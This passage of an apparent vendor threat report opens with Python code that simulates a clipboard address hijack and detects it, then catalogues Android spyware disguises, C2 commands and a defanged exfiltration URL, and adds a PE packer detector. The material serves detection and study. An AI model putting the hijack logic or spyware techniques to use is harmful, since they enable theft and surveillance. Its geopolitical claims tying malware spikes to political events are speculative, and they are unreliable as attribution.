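            raise ValueError("not a base58 character: %r" % ch)
        n = n * 58 + digit
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    return b"\x00" * (len(s) - len(s.lstrip("1"))) + body


def valid_base58check(addr):
    """True if `addr` decodes to 25 bytes whose last 4 are sha256d of the first 21."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    digest = hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()
    return digest[:4] == raw[21:]


def hijack(clipboard, attacker_addr):
    """What the malware does: swap any copied address of a kind it has a wallet for."""
    if address_kind(clipboard) == address_kind(attacker_addr):
        return attacker_addr
    return clipboard


def guard_paste(copied, clipboard_now):
    """Verdict for a paste: 'ok', 'swapped', 'clipboard-changed' or 'malformed'."""
    if clipboard_now != copied:
        return "swapped" if address_kind(clipboard_now) else "clipboard-changed"
    if address_kind(copied) == "btc-legacy" and not valid_base58check(copied):
        return "malformed"
    return "ok"


if __name__ == "__main__":
    copied = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"    # address from the report
    attacker = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"  # address from the report
    now = hijack(copied, attacker)
    print(now, guard_paste(copied, now))
```

The checksum test does not catch the swap itself (the attacker's address is a perfectly valid one); it catches the older, cruder variants that patch a few characters of the original. The comparison of copied versus current clipboard is what catches the substitution, which is why wallet software that shows the destination address prominently and asks the user to confirm its first and last characters is the practical defense.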


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they are coming back in an updated disguise and promise to become a serious new challenge for security departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: every smartphone holds a wealth of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the contents of the device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. And cybercriminals are not the only ones hunting for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking their partners' every move and parents wanting to control their children, and it is easy to see why Android malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. The whole family of these digital spooks is shown on the graph.

The digital spooks


Like real-world spies, these digital agents impersonate legitimate entities, posing as innocent applications or hiding malicious code inside legitimate software. Like real spies, they try to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions.

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher to avoid detection. This sample has wide-ranging spying abilities. It steals account details, contacts (id, name, phone numbers) and the owner's email address. It grabs SMS messages and associated metadata. It attempts to read call logs (number, name, type, duration), emails (email type) and contact photos. After extracting all the data, the malware encrypts it with AES and sends it to the attackers' server at hxxp://cgalim.com/admin/hr/pu/pu.php?do=upload.

KevDroid records the victim's every phone call, then encrypts and uploads the recording to the cybercriminals' server. In addition it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera, covertly records the victim's activity and sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and builds a list of the files on the device. It also extracts the web history, account and contact details, and device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread through the official Google Play store, camouflaged as a chat app called Dardesh Instant App. When a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly tracked all events on the infected device. Social networks were another means of disseminating the malware.

Version-1: Dardesh (Google Play Services, Instant Apps)

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. Its capability set resembles that of commercial spyware tools such as FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.


4.1.2 ZooPark

The next member of the spy family, ZooPark, has four different versions.

Version-1: Telegram Groups, انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version impersonates the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in the spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the application installed

Collect browserrsquos data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications such as VPN Easy and DroFirewall.


In addition to the abilities of the previous versions, it has some extra tricks:

Extracts photos audios and videos

Records screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. Instead of a girlfriend it delivers a bundle of malicious abilities:

Takes control over Bluetooth Adapter

Extracts data about accounts contacts details installed apps

Extracts data from the WhatsApp Message DB and related keys

Uploads collected data to the cybercriminalsrsquo server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contacts details

Set Wi-Fi always turned on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy, MBackup

HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service

Mobile Spy

随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z

CloudAgent, New Insta Follow, Android, CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware feature set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines information-stealing spyware with a banking trojan that connects to the C&C server of the LokiBot Android banker. The second version of Mystery Bot is ransomware that encrypts files on external storage and deletes the originals after encryption. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes disguised as Adobe Flash Player. Below is a list of some of the commands the malware can execute on a device:


Send_SMS - extract SMS content and send it to the C&C server

Send_USSD - send the USSD to the C&C server

Gethistory - monitor browser history

Start_AllApp - gather info about installed applications

Send_call - set the Intent action to call

Forward_call - forward incoming calls

ResForward_call - reset call forwarding

Go_Smsmnd - delete SMS content

Go_GetAlls - get SMS history

Dell_sms - delete SMS content in a conversation

Send_spam - send spam SMS

Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also wears many masks, as the screenshot shows.

佐川急便 (Sagawa Express), 현대캐피탈 (Hyundai Capital)

Disguises of FakeSpy

It collects all available information from the infected device and sends it to its C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information


4.1.8 RedAlert

RedAlert switches between multiple "spy legends" to win users' trust, wearing the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber

Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device for the following banking applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can block access to several services, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, operates mostly in Iran. It spreads through third-party app stores, social networks and messengers.

Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning such as "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, and so on. The newly infected device is controlled through Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram variants for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1:

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes infected devices to WAP and SMS services, adding extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option; if the user taps it, the malware starts working in the background, subscribing the user to services she never ordered.

It reaches victims in the variety of disguises listed above.

4.1.11 CoinHive

The last entry in our Q2 Android malware list is CoinHive. We mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which improves its mining capability. It is disseminated via the counterfeit apps shown below, but one of its vectors is especially interesting.

Version-1: Netflix Hack, Instagram Hack

Version-2: TSF Launcher

Version-3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for the purpose, downloads it and implants it on the victims' machines. What she does not know is that another cybercriminal had earlier infected that copy of CoinMiner with CoinHive. So the first attacker is herself a victim: a thief robbing a thief.

This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds


4.2 Android Malware Catalogued by Month

Below are detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May



4.2.3 June 2018

Android-targeted malware in June



5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and cause denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing the planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections

And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018


5.1.2 Net Worms

A “Net Worm” typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a “multi-threaded, polymorphic” worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or “peers”) that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a “memory resident” virus that infects “.exe” and “.scr” files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an “IM” or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom (“gb” for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that “infects” other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a “severe” virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a “Remote Service Account”.

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a “Severe” malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is “packed” refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified “Ultimate Packer for Executables”, dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
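The packed layout described above (a section reserved for the unpacked image, a high-entropy compressed section, and a small decompression stub) can be recognised from the PE section table alone. The following is an added example, not code from the Comodo report: a small Python parser that reads the section headers and flags UPX-style indicators by section name and byte entropy. The section-name list, the 7.0 bits-per-byte threshold and the two constructed sample images are assumptions for illustration, not values from the report.

```python
"""Added example (not from the Comodo report): read a PE section table and
flag UPX-style packing. Stock UPX leaves an empty UPX0 section (reserved for
the unpacked image) and a high-entropy UPX1 section holding the compressed
code; a modified UPX (MUPX) may rename sections, so entropy is the stronger cue."""
import math
import struct

# Section names written by stock UPX (assumption for this example; renamed
# sections will only trip the entropy and empty-on-disk checks below).
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b"UPX!"}
HIGH_ENTROPY = 7.0  # bits per byte; compressed or encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty or constant data)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                          # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size                 # section headers, 40 bytes each
    sections = []
    for i in range(num_sections):
        (name, vsize, _vaddr, raw_size, raw_ptr,
         _, _, _, _, _chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": shannon_entropy(raw),
        })
    return sections


def packer_indicators(pe: bytes) -> dict:
    """Three independent cues that a PE image is UPX-style packed."""
    secs = parse_sections(pe)
    return {
        "upx_named": [s["name"] for s in secs if s["name"].encode() in UPX_SECTION_NAMES],
        "high_entropy": [s["name"] for s in secs if s["entropy"] >= HIGH_ENTROPY],
        # reserved in memory but empty on disk: the unpacker writes code there at run time
        "empty_on_disk": [s["name"] for s in secs if s["raw_size"] == 0 and s["virtual_size"] > 0],
    }


def looks_packed(pe: bytes) -> bool:
    """Verdict: known packer names, or the compressed-blob + empty-section pair."""
    ind = packer_indicators(pe)
    return bool(ind["upx_named"]) or (bool(ind["high_entropy"]) and bool(ind["empty_on_disk"]))


def build_pe(specs) -> bytes:
    """Construct a minimal PE skeleton for testing (headers plus section data,
    no optional header, not runnable). specs: (name, raw_bytes, virtual_size)."""
    n = len(specs)
    raw_ptr = 0x40 + 4 + 20 + 40 * n             # raw data follows the headers
    table, blobs = b"", b""
    for name, raw, vsize in specs:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, 0x1000,
                             len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        raw_ptr += len(raw)
        blobs += raw
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0, 0x102)  # i386, no optional hdr
    return dos + b"PE\0\0" + coff + table + blobs


# Constructed samples: a UPX-style packed layout and a plain unpacked one.
PACKED_SAMPLE = build_pe([
    (b"UPX0", b"", 0x8000),                         # empty on disk; unpacked image goes here
    (b"UPX1", bytes(range(256)) * 16, 0x1000),      # stand-in for compressed code, entropy 8.0
    (b".rsrc", b"\0" * 512, 0x200),
])
CLEAN_SAMPLE = build_pe([
    (b".text", b"\x55\x8b\xec\x90" * 256, 0x400),   # repetitive code-like bytes, entropy 2.0
    (b".data", b"\0" * 512, 0x200),
])
```

Run `looks_packed()` over a directory of executables and triage the hits; a renamed-section (MUPX-style) sample will show up through the entropy and empty-on-disk cues even when `upx_named` is empty.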


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to “kill” them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a “Medium” threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application” or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and “system optimizers”.

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section, let's examine unique malware profiles that Comodo identified within specific “verticals” or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine “Zbot”, which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

